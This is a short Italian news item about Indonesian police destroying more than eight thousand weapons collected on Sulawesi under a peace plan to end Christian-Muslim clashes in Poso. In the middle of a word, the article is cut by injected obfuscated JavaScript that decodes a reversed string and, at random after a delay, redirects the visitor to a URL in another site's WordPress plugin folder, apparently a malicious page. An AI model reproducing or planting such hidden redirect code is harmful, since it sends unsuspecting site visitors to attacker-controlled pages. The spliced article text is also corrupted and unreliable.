Armi distrutte in Indonesia

image_pdfimage_print

La polizia ha annunciato di aver distrutto più di ottomila armi raccolte nell’isola di Sulawesi nell’ambito di un piano di pace per porre fine a due anni di scontri tra cristiani e musulmani. Entrambe le parti il mese scorso hanno firmato un accordo accett (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando di consegnare le armi dopo nuovi attacchi dei musulmani ai villaggi cristiani nella regione di Poso. In due anni le violenze hanno causato almeno mille vittime e migliaia di profughi.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *